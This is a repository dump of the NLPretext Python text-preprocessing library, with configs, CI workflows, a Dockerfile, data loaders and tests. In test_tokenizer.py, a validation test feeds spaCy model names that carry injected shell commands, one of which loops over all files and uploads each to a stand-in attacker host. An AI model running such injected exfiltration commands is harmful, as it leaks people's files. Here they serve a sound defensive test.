├── nlpretext
├── py.typed
├── cli
│ ├── __init__.py
│ ├── __main__.py
│ └── preprocess.py
├── _utils
│ ├── daskloader.py
│ ├── __init__.py
│ ├── pandasloader.py
│ ├── stopwords.py
│ ├── file_loader.py
│ └── phone_number.py
├── basic
│ ├── __init__.py
│ └── preprocess.py
├── token
│ ├── __init__.py
│ ├── preprocess.py
│ └── tokenizer.py
├── _config
│ ├── __init__.py
│ ├── constants.py
│ └── config.py
├── social
│ ├── __init__.py
│ └── preprocess.py
├── augmentation
│ ├── __init__.py
│ └── text_augmentation.py
├── __init__.py
├── preprocessor.py
└── textloader.py
├── tests
├── __init__.py
├── test_tokenizer.py
├── test_phone_number.py
├── test_data_augmentation.py
├── test_file_loader.py
└── test_textloader.py
├── references
├── .gitkeep
└── logo_nlpretext.png
├── docs
├── source
│ ├── _static
│ │ └── images
│ │ │ └── python_logo.png
│ ├── tutorials
│ │ ├── index.rst
│ │ └── basic_notebook.ipynb
│ ├── _templates
│ │ ├── module.rst_t
│ │ ├── versions.html
│ │ └── package.rst_t
│ ├── index.rst
│ └── conf.py
├── Makefile
├── scripts
│ └── buildsite.sh
└── make.bat
├── .github
├── CODEOWNERS
├── ISSUE_TEMPLATE
│ ├── config.yml
│ ├── question.md
│ ├── feature_request.md
│ └── bug_report.md
├── workflows
│ ├── release-drafter.yml
│ ├── greetings.yml
│ ├── ci.yml
│ └── cd.yml
├── .stale.yml
├── release-drafter.yml
├── dependabot.yml
└── PULL_REQUEST_TEMPLATE.md
├── .dockerignore
├── .editorconfig
├── docker
├── Dockerfile
└── README.md
├── datasets
└── external
│ ├── get_language_dataset.sh
│ └── get_stanfordtweets.sh
├── SECURITY.md
├── .pre-commit-config.yaml
├── CONTRIBUTING.md
├── CODE_OF_CONDUCT.md
├── Makefile
├── pyproject.toml
├── LICENSE
├── .gitignore
└── README.md
/nlpretext/py.typed:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/references/.gitkeep:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/nlpretext/cli/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/references/logo_nlpretext.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/artefactory/NLPretext/HEAD/references/logo_nlpretext.png
--------------------------------------------------------------------------------
/docs/source/_static/images/python_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/artefactory/NLPretext/HEAD/docs/source/_static/images/python_logo.png
--------------------------------------------------------------------------------
/.github/CODEOWNERS:
--------------------------------------------------------------------------------
1 | # https://help.github.com/en/articles/about-code-owners
2 |
3 | * @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606
4 |
--------------------------------------------------------------------------------
/docs/source/tutorials/index.rst:
--------------------------------------------------------------------------------
1 | Tutorials
2 | =========
3 |
4 |
5 | .. toctree::
6 | :maxdepth: 4
7 | :glob:
8 |
9 | basic_notebook
10 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/config.yml:
--------------------------------------------------------------------------------
1 | # Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository
2 |
3 | blank_issues_enabled: false
4 |
--------------------------------------------------------------------------------
/docs/source/_templates/module.rst_t:
--------------------------------------------------------------------------------
1 |
2 | {%- if show_headings %}
3 | {{- [basename] | join(' ') | e | heading }}
4 |
5 | {% endif -%}
6 | .. automodule:: {{ qualname }}
7 | {%- for option in automodule_options %}
8 | :{{ option }}:
9 | {%- endfor %}
10 |
--------------------------------------------------------------------------------
/.github/workflows/release-drafter.yml:
--------------------------------------------------------------------------------
1 | name: Release Drafter
2 |
3 | on:
4 | push:
5 | # branches to consider in the event; optional, defaults to all
6 | branches:
7 | - main
8 |
9 | jobs:
10 | update_release_draft:
11 | runs-on: ubuntu-latest
12 | steps:
13 | # Drafts your next Release notes as Pull Requests are merged into "main"
14 | - uses: release-drafter/release-drafter@v5.22.0
15 | env:
16 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
17 |
--------------------------------------------------------------------------------
/.dockerignore:
--------------------------------------------------------------------------------
1 | # Git
2 | .git
3 | .gitignore
4 | .github
5 |
6 | # Docker
7 | .dockerignore
8 | docker/
9 |
10 | # IDE
11 | .idea
12 | .vscode
13 |
14 | # Byte-compiled / optimized / DLL files
15 | __pycache__/
16 | **/__pycache__/
17 | *.pyc
18 | *.pyo
19 | *.pyd
20 | .Python
21 | *.py[cod]
22 | *$py.class
23 | .pytest_cache/
24 | ..mypy_cache/
25 |
26 | # poetry
27 | .venv
28 |
29 | # C extensions
30 | *.so
31 |
32 | # Virtual environment
33 | .venv
34 | venv
35 |
36 | .DS_Store
37 | .AppleDouble
38 | .LSOverride
39 | ._*
40 |
--------------------------------------------------------------------------------
/.editorconfig:
--------------------------------------------------------------------------------
1 | # Check http://editorconfig.org for more information
2 | # This is the main config file for this project:
3 | root = true
4 |
5 | [*]
6 | charset = utf-8
7 | end_of_line = lf
8 | insert_final_newline = true
9 | indent_style = space
10 | indent_size = 2
11 | trim_trailing_whitespace = true
12 |
13 | [*.{py, pyi}]
14 | indent_style = space
15 | indent_size = 4
16 |
17 | [Makefile]
18 | indent_style = tab
19 |
20 | [*.md]
21 | trim_trailing_whitespace = false
22 |
23 | [*.{diff,patch}]
24 | trim_trailing_whitespace = false
25 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/question.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: ❓ Question
3 | about: Ask a question about this project 🎓
4 | title: ''
5 | labels: question
6 | assignees:
7 | ---
8 |
9 | ## Checklist
10 |
11 |
12 |
13 | - [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext}/issues?q=is%3Aissue).
14 |
15 | ## ❓ Question
16 |
17 |
18 |
19 | How can I [...]?
20 |
21 | Is it possible to [...]?
22 |
23 | ## 📎 Additional context
24 |
25 |
26 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: 🚀 Feature request
3 | about: Suggest an idea for this project 🏖
4 | title: ''
5 | labels: enhancement
6 | assignees:
7 | ---
8 |
9 | ## 🚀 Feature Request
10 |
11 |
12 |
13 | ## 🔈 Motivation
14 |
15 |
16 |
17 | ## 🛰 Alternatives
18 |
19 |
20 |
21 | ## 📎 Additional context
22 |
23 |
24 |
--------------------------------------------------------------------------------
/docker/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.10-slim-buster
2 |
3 | ENV LANG=C.UTF-8 \
4 | LC_ALL=C.UTF-8
5 |
6 | RUN apt-get update && \
7 | apt-get install -y --no-install-recommends \
8 | curl coreutils \
9 | && rm -rf /var/lib/apt/lists/*
10 |
11 | # Install Poetry
12 | ENV POETRY_VERSION=1.5.1
13 | RUN pip install --upgrade pip
14 | RUN python3 -m pip install "poetry==$POETRY_VERSION"
15 |
16 | WORKDIR /home/workspace
17 |
18 | COPY pyproject.toml ./
19 |
20 | RUN poetry config virtualenvs.create false \
21 | && poetry lock \
22 | && poetry install --no-root --no-dev --no-interaction
23 |
24 | COPY . /home/docker_user/workspace/
25 |
26 | ENTRYPOINT ["poetry", "run", "nlpretext"]
27 |
--------------------------------------------------------------------------------
/nlpretext/cli/__main__.py:
--------------------------------------------------------------------------------
1 | # mypy: disable-error-code="attr-defined"
2 |
3 | import typer
4 | from nlpretext import __version__
5 | from nlpretext.cli import preprocess
6 | from rich.console import Console
7 |
8 | app = typer.Typer(
9 | name="nlpretext",
10 | help="All the goto functions you need to handle NLP use-cases, integrated in NLPretext",
11 | add_completion=True,
12 | )
13 | app.add_typer(preprocess.app, name="preprocess")
14 | console = Console()
15 |
16 |
17 | def version_callback(value: bool) -> None:
18 | """Prints the version of the package."""
19 | if value:
20 | console.print(f"[yellow]nlpretext[/] version: [bold blue]{__version__}[/]")
21 | raise typer.Exit()
22 |
--------------------------------------------------------------------------------
/tests/test_tokenizer.py:
--------------------------------------------------------------------------------
1 | import pytest
2 | from nlpretext.token.tokenizer import LanguageNotInstalledError, _load_spacy_model
3 |
4 |
5 | @pytest.mark.parametrize(
6 | "bad_model_name",
7 | [
8 | ("en_core_web_sm; chmod -x hacker"),
9 | (
10 | "fr_core_news_sm | for file in $(find .); "
11 | 'do curl_command -X POST -H "Content-Type: multipart/form-data" '
12 | '-F "data=@${file}" https-fake://hacker.api/upload; done'
13 | ),
14 | ],
15 | )
16 | def test_load_spacy_model_validation(bad_model_name):
17 | with pytest.raises(LanguageNotInstalledError) as e:
18 | _load_spacy_model(bad_model_name)
19 | assert bad_model_name in str(e.value)
20 |
--------------------------------------------------------------------------------
/.github/.stale.yml:
--------------------------------------------------------------------------------
1 | # Number of days of inactivity before an issue becomes stale
2 | daysUntilStale: 60
3 | # Number of days of inactivity before a stale issue is closed
4 | daysUntilClose: 7
5 | # Issues with these labels will never be considered stale
6 | exemptLabels:
7 | - pinned
8 | - security
9 | # Label to use when marking an issue as stale
10 | staleLabel: wontfix
11 | # Comment to post when marking an issue as stale. Set to `false` to disable
12 | markComment: >
13 | This issue has been automatically marked as stale because it has not had
14 | recent activity. It will be closed if no further activity occurs. Thank you
15 | for your contributions.
16 | # Comment to post when closing a stale issue. Set to `false` to disable
17 | closeComment: false
18 |
--------------------------------------------------------------------------------
/nlpretext/_utils/daskloader.py:
--------------------------------------------------------------------------------
1 | # mypy: disable-error-code="attr-defined"
2 | from typing import List, Union
3 |
4 | import dask.bag as db
5 | import dask.dataframe as dd
6 |
7 |
8 | def read_text(files_path: Union[str, List[str]], encoding: str): # type: ignore
9 | return db.read_text(files_path, encoding=encoding).str.strip().to_dataframe()
10 |
11 |
12 | def read_json(files_path: Union[str, List[str]], encoding: str): # type: ignore
13 | return dd.read_json(files_path, encoding=encoding)
14 |
15 |
16 | def read_csv(files_path: Union[str, List[str]], encoding: str): # type: ignore
17 | return dd.read_csv(files_path, encoding=encoding)
18 |
19 |
20 | def read_parquet(files_path: Union[str, List[str]], encoding: str): # type: ignore
21 | return dd.read_parquet(files_path, encoding=encoding)
22 |
--------------------------------------------------------------------------------
/.github/workflows/greetings.yml:
--------------------------------------------------------------------------------
1 | name: Greetings
2 |
3 | on:
4 | pull_request:
5 | types:
6 | - opened
7 | - reopened
8 | - edited
9 | - labeled
10 | - unlabeled
11 | - synchronize
12 | issues:
13 |
14 | jobs:
15 | greeting:
16 | runs-on: ubuntu-latest
17 | if: ${{ !contains(github.head_ref, 'dependabot/') }}
18 | steps:
19 | - uses: actions/first-interaction@v1
20 | with:
21 | repo-token: ${{ secrets.GITHUB_TOKEN }}
22 | pr-message: 'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.'
23 | issue-message: |
24 | Hello @${{ github.actor }}, thank you for your interest in our work!
25 |
26 | If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we can not help you.
27 |
--------------------------------------------------------------------------------
/nlpretext/basic/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/nlpretext/token/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/.github/release-drafter.yml:
--------------------------------------------------------------------------------
1 | # Release drafter configuration https://github.com/release-drafter/release-drafter#configuration
2 | # Emojis were chosen to match the https://gitmoji.carloscuesta.me/
3 |
4 | name-template: "$NEXT_PATCH_VERSION"
5 | tag-template: "$NEXT_PATCH_VERSION"
6 |
7 | categories:
8 | - title: ":rocket: Features"
9 | labels: [enhancement, feature]
10 | - title: ":wrench: Fixes & Refactoring"
11 | labels: [bug, refactoring, bugfix, fix]
12 | - title: ":package: Build System & CI/CD"
13 | labels: [build, ci, testing]
14 | - title: ":boom: Breaking Changes"
15 | labels: [breaking]
16 | - title: ":pencil: Documentation"
17 | labels: [documentation]
18 | - title: ":arrow_up: Dependencies updates"
19 | labels: [dependencies]
20 |
21 | template: |
22 | ## What’s Changed
23 |
24 | $CHANGES
25 |
26 | ## :busts_in_silhouette: List of contributors
27 |
28 | $CONTRIBUTORS
29 |
--------------------------------------------------------------------------------
/nlpretext/_config/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/nlpretext/_utils/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/nlpretext/social/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/nlpretext/augmentation/__init__.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: 🐛 Bug report
3 | about: If something isn't working 🔧
4 | title: ''
5 | labels: bug
6 | assignees:
7 | ---
8 |
9 | ## 🐛 Bug Report
10 |
11 |
12 |
13 | ## 🔬 How To Reproduce
14 |
15 | Steps to reproduce the behavior:
16 |
17 | 1. ...
18 |
19 | ### Code sample
20 |
21 |
22 |
23 | ### Environment
24 |
25 | * OS: [e.g. Linux / Windows / macOS]
26 | * Python version, get it with:
27 |
28 | ```bash
29 | python --version
30 | ```
31 |
32 | ### Screenshots
33 |
34 |
35 |
36 | ## 📈 Expected behavior
37 |
38 |
39 |
40 | ## 📎 Additional context
41 |
42 |
43 |
--------------------------------------------------------------------------------
/docs/source/_templates/versions.html:
--------------------------------------------------------------------------------
1 |
2 | {%- if current_version %}
3 |
4 |
5 | Other Versions
6 | v: {{ current_version.name }}
7 |
8 |
9 |
10 | {%- if versions.tags %}
11 |
12 | Tags
13 | {%- for item in versions.tags %}
14 | {{ item.name }}
15 | {%- endfor %}
16 |
17 | {%- endif %}
18 | {%- if versions.branches %}
19 |
20 | Branches
21 | {%- for item in versions.branches %}
22 | {{ item.name }}
23 | {%- endfor %}
24 |
25 | {%- endif %}
26 |
27 |
28 | {%- endif %}
29 |
--------------------------------------------------------------------------------
/docs/source/index.rst:
--------------------------------------------------------------------------------
1 | =========
2 | NLPretext
3 | =========
4 |
5 |
6 | Welcome to NLPretext's documentation!
7 | ========================================
8 |
9 | The NLPretext library aimed to be a meta-library to be used to help you get started on handling your NLP use-case preprocessing.
10 |
11 |
12 | # Installation
13 |
14 | Beware, this package has been tested on Python `3.8`, `3.9` & `3.10` and will probably not be working under python **2.7** as **Python2.7** EOL is scheduled for December 2019.
15 |
16 | To install this library you should first clone the repository:
17 |
18 | pip install nlpretext
19 |
20 |
21 | .. toctree::
22 | :maxdepth: 4
23 | :caption: Tutorials:
24 |
25 | ./tutorials/index
26 |
27 | .. toctree::
28 | :maxdepth: 2
29 | :caption: API Reference:
30 |
31 | ./apidoc/modules
32 |
33 | Indices and tables
34 | ==================
35 |
36 | * :ref:`genindex`
37 | * :ref:`modindex`
38 | * :ref:`search`
39 |
--------------------------------------------------------------------------------
/docker/README.md:
--------------------------------------------------------------------------------
1 | # Docker for nlpretext
2 |
3 | ## Installation
4 |
5 | To create Docker you need to run:
6 |
7 | ```bash
8 | make docker
9 | ```
10 |
11 | which is equivalent to:
12 |
13 | ```bash
14 | make docker VERSION=latest
15 | ```
16 |
17 | You could also provide name and version for the image itself.
18 | Default name is `IMAGE := nlpretext`.
19 | Default version is `VERSION := latest`.
20 |
21 | ```bash
22 | make docker IMAGE=some_name VERSION=1.0.4
23 | ```
24 |
25 | ## Usage
26 |
27 | ```bash
28 | docker run -it --rm \
29 | -v $(pwd):/workspace \
30 | nlpretext bash
31 | ```
32 |
33 | ## How to clean up
34 |
35 | To uninstall docker image run `make clean_docker` with `VERSION`:
36 |
37 | ```bash
38 | make clean_docker VERSION=1.0.4
39 | ```
40 |
41 | like in installation, you can also choose the image name
42 |
43 | ```bash
44 | make clean_docker IMAGE=some_name VERSION=latest
45 | ```
46 |
47 | If you want to clean all, including `build` run `make clean`
48 |
--------------------------------------------------------------------------------
/docs/Makefile:
--------------------------------------------------------------------------------
1 | # Minimal makefile for Sphinx documentation
2 | #
3 |
4 | # You can set these variables from the command line, and also
5 | # from the environment for the first two.
6 | SPHINXOPTS ?=
7 | SPHINXBUILD ?= poetry run sphinx-build
8 | SPHINXAPIBUILD ?= poetry run sphinx-apidoc
9 | SPHINXMULTIVERSION ?= poetry run sphinx-multiversion
10 | SOURCEDIR = source
11 | BUILDDIR = build
12 |
13 | # Put it first so that "make" without argument is like "make help".
14 | .PHONY: help Makefile
15 | help:
16 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
17 |
18 | multiversion:
19 | @$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html
20 |
21 | apidoc:
22 | @$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates
23 |
24 | # Catch-all target: route all unknown targets to Sphinx using the new
25 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
26 | %: Makefile
27 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
28 |
--------------------------------------------------------------------------------
/datasets/external/get_language_dataset.sh:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | #!/bin/bash
19 | wget -O wili.zip https://zenodo.org/record/841984/files/wili-2018.zip?download=1
20 | mkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd ..
21 |
--------------------------------------------------------------------------------
/datasets/external/get_stanfordtweets.sh:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | #!/bin/bash
19 | wget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip trainingandtestdata.zip
20 | mkdir -p tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip
21 |
--------------------------------------------------------------------------------
/nlpretext/_utils/pandasloader.py:
--------------------------------------------------------------------------------
1 | from typing import List, Union
2 |
3 | import pandas as pd
4 | from fsspec import open_files
5 |
6 |
7 | def _list_handler(func):
8 | def wrapper_list_handler(file_path: Union[str, List[str]], *args, **kwargs) -> pd.DataFrame: # type: ignore
9 | list_files = open_files(file_path)
10 | list_df = [func(file.path, *args, **kwargs) for file in list_files]
11 | df = pd.concat(list_df)
12 | return df
13 |
14 | return wrapper_list_handler
15 |
16 |
17 | @_list_handler
18 | def read_text(file_path: str, encoding: str) -> pd.DataFrame:
19 | df = pd.read_fwf(file_path, encoding=encoding, colspecs=[(None, None)])
20 | return df
21 |
22 |
23 | @_list_handler
24 | def read_json(file_path: str, encoding: str) -> pd.DataFrame:
25 | df = pd.read_json(file_path, encoding=encoding)
26 | return df
27 |
28 |
29 | @_list_handler
30 | def read_csv(file_path: str, encoding: str) -> pd.DataFrame:
31 | df = pd.read_csv(file_path, encoding=encoding)
32 | return df
33 |
34 |
35 | @_list_handler
36 | def read_parquet(file_path: str, encoding: str) -> pd.DataFrame:
37 | df = pd.read_parquet(file_path, encoding=encoding)
38 | return df
39 |
--------------------------------------------------------------------------------
/.github/dependabot.yml:
--------------------------------------------------------------------------------
1 | # Configuration: https://dependabot.com/docs/config-file/
2 | # Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically
3 |
4 | version: 2
5 |
6 | updates:
7 | - package-ecosystem: "pip"
8 | directory: "/"
9 | schedule:
10 | interval: "weekly"
11 | day: "monday"
12 | time: "09:00"
13 | allow:
14 | - dependency-type: "all"
15 | ignore:
16 | - dependency-name: "*"
17 | update-types: ["version-update:semver-patch"]
18 | labels:
19 | - draft
20 | - dependencies
21 | - python
22 | - package-ecosystem: "github-actions"
23 | directory: "/"
24 | schedule:
25 | interval: "weekly"
26 | day: "monday"
27 | time: "09:00"
28 | allow:
29 | - dependency-type: "all"
30 | labels:
31 | - draft
32 | - dependencies
33 | - github_actions
34 | - package-ecosystem: "docker"
35 | directory: "/docker/"
36 | schedule:
37 | interval: "weekly"
38 | day: "monday"
39 | time: "09:00"
40 | allow:
41 | - dependency-type: "all"
42 | labels:
43 | - draft
44 | - dependencies
45 | - docker
46 |
--------------------------------------------------------------------------------
/SECURITY.md:
--------------------------------------------------------------------------------
1 | # Security
2 |
3 | ## 🔐 Reporting Security Issues
4 |
5 | > Do not open issues that might have security implications!
6 | > It is critical that security related issues are reported privately so we have time to address them before they become public knowledge.
7 |
8 | Vulnerabilities can be reported by emailing core members:
9 |
10 | - artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com)
11 |
12 | Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue:
13 |
14 | - Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.)
15 | - Full paths of source file(s) related to the manifestation of the issue
16 | - The location of the affected source code (tag/branch/commit or direct URL)
17 | - Any special configuration required to reproduce the issue
18 | - Environment (e.g. Linux / Windows / macOS)
19 | - Step-by-step instructions to reproduce the issue
20 | - Proof-of-concept or exploit code (if possible)
21 | - Impact of the issue, including how an attacker might exploit the issue
22 |
23 | This information will help us triage your report more quickly.
24 |
25 | ## Preferred Languages
26 |
27 | We prefer all communications to be in English.
28 |
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
1 | ## Description
2 |
3 |
4 |
5 | ## Related Issue
6 |
7 |
8 |
9 | ## Type of Change
10 |
11 |
12 |
13 | - [ ] 📚 Examples / docs / tutorials / dependencies update
14 | - [ ] 🔧 Bug fix (non-breaking change which fixes an issue)
15 | - [ ] 🥂 Improvement (non-breaking change which improves an existing feature)
16 | - [ ] 🚀 New feature (non-breaking change which adds functionality)
17 | - [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change)
18 | - [ ] 🔐 Security fix
19 |
20 | ## Checklist
21 |
22 |
23 |
24 | - [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext}/blob/main/CODE_OF_CONDUCT.md) document.
25 | - [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext}/blob/main/CONTRIBUTING.md) guide.
26 | - [ ] I've updated the code style using `make format-code`.
27 | - [ ] I've written tests for all new methods and classes that I created.
28 | - [ ] I've written the docstring in Google format for all the methods and classes that I used.
29 |
--------------------------------------------------------------------------------
/docs/source/_templates/package.rst_t:
--------------------------------------------------------------------------------
1 |
2 | {%- macro automodule(modname, options) -%}
3 | .. automodule:: {{ modname }}
4 | {%- for option in options %}
5 | :{{ option }}:
6 | {%- endfor %}
7 | {%- endmacro %}
8 |
9 | {%- macro toctree(docnames) -%}
10 | .. toctree::
11 | :maxdepth: {{ maxdepth }}
12 | {% for docname in docnames %}
13 | {{ docname }}
14 | {%- endfor %}
15 | {%- endmacro %}
16 |
17 | {%- if is_namespace %}
18 | {{- ["**", pkgname, "**"] | join("") | heading }}
19 | {% else %}
20 | {% set pkg_list = pkgname.split('.') %}
21 | {{- ["**", pkg_list[-1], "**"] | join("") | heading }}
22 | {% endif %}
23 |
24 | {%- if modulefirst and not is_namespace %}
25 | {{ automodule(pkgname, automodule_options) }}
26 | {% endif %}
27 |
28 | {%- if subpackages %}
29 |
30 | {{ toctree(subpackages) }}
31 | {% endif %}
32 |
33 | {%- if submodules %}
34 | {% if separatemodules %}
35 | {{ toctree(submodules) }}
36 | {% else %}
37 | {%- for submodule in submodules %}
38 | {% if show_headings %}
39 | {% set submodule_list = submodule.split('.') %}
40 | {{- [submodule_list[-1]] | join(" ") | e | heading(2) }}
41 | {% endif %}
42 | {{ automodule(submodule, automodule_options) }}
43 | {% endfor %}
44 | {%- endif %}
45 | {%- endif %}
46 |
47 | {%- if not modulefirst and not is_namespace %}
48 |
49 | {{ automodule(pkgname, automodule_options) }}
50 | {% endif %}
51 |
--------------------------------------------------------------------------------
/nlpretext/cli/preprocess.py:
--------------------------------------------------------------------------------
1 | from typing import List
2 |
3 | import typer
4 | from nlpretext.preprocessor import Preprocessor
5 | from nlpretext.textloader import TextLoader
